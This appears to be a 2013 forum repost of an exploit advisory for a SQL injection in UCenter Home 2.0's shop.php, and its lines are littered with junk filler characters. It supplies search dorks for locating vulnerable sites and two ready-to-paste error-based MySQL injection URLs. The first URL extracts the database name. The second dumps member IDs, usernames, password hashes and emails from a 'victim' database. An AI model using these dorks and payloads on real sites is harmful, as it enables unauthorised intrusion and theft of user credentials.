中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]
作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
. D8 {7 L) i% |$ h! z
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  7 K. a  _) ]8 W" H8 B: W

  Q, V% M: D9 k& R3 [- f$ x                                 
4 m& m' `8 o& {. Z6 u# I5 q: l1 T4 |) z9 ~1 u- _
*/ Author : KnocKout  ( \$ V( D! ?9 `

# @6 h4 l; q" m9 y; k. Y/ z*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
; Q' U' `, d. O) g6 [9 @
# E- Q7 W9 ~6 {7 {*/ Contact: knockoutr@msn.com  3 D8 @, E; B" y1 f# @. V
  b, F# \1 u/ I1 j
*/ Cyber-Warrior.org/CWKnocKout  $ X) E) f- p: |
* H' Z$ k6 K$ m, c" @7 N/ o8 {# r
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
; M, ]: o# Y% ?5 `( p1 V, ]. P+ l1 ]8 C* I# }
Script : UCenter Home  * v' n- V6 K: V7 B0 ^/ X

1 I$ f2 k" l- v" z: L4 v( w/ hVersion : 2.0  
- ]( W8 J" E) x# @! ^$ w4 K1 ]
  A6 ?- j- g1 k/ `4 u' I. eScript HomePage : http://u.discuz.net/  7 d" m! X/ J: c% Z; q, g3 {6 w; {

# }/ L0 V$ ^0 }  S# |$ h6 d__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
& Z" b7 _+ G, s+ r
, o4 t% y) P6 A% k; q$ r5 n4 u* ODork : Powered by UCenter inurl:shop.php?ac=view  ( K7 t5 b, g6 t- {2 [- t

4 l/ N, k/ T5 K7 T4 P5 J  }; f- U! gDork 2 : inurl:shop.php?ac=view&shopid=  + f+ B4 ~( w  ?
6 j8 V4 n* @6 B5 B
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
8 n# s- v+ {" C/ [  H7 H! m2 S' Q0 i) s  F: {: D
Vuln file : Shop.php  
0 G) _& ~. C( _* @! r3 K1 V6 S3 ^1 x
value's : (?)ac=view&shopid=  
8 V6 W8 T) b* W
# {6 V/ r; S3 d* u* f: i+ `Vulnerable Style : SQL Injection (MySQL Error Based)  
3 B1 c" [& W( _/ M7 n' N+ y; \4 S+ M
Need Metarials : Hex Conversion  % E3 a) H( D0 z" X

% J" U! X# u2 ~3 Q' j) }$ N__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ! x% e' e1 H. J: g& {6 T5 z# }6 Q
/ c5 B+ p: X. ?8 }
Your Need victim Database name.   
, [5 }. W3 T5 Z7 o) c: N( l4 M% e4 V: {% J) d
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
8 P( a  {- Q  M9 y3 U$ F( Z: a; o
..  
2 X( q3 j& u: s/ L8 A3 ^" M1 P" ~5 D4 X6 ^
DB : Okey.  
- u+ b1 U& q/ D& L+ X7 }% I4 ~# P4 Z
your edit DB `[TARGET DB NAME]`  . X: @% J& c% w" B. y: \; B. z
; ]" w' b6 K; m! _
Example : 'hiwir1_ucenter'  
" q- k7 k5 z3 W( Y% B6 u6 D0 ~+ a6 C# N' f0 L% |( P
Edit : Okey.  
- }3 `9 q+ |/ D
$ M: w/ E, ]- FYour use Hex conversion. And edit Your SQL Injection Exploit..  
% V* ?9 c  h8 j* f% ^* L
  \( H! m5 {4 Y   " S) Z/ G. [7 J! a! J
  }; b$ m7 Y" r1 ]7 g' E7 E
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  . L6 t4 G- k. l/ b5 u" ]/ x7 k




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2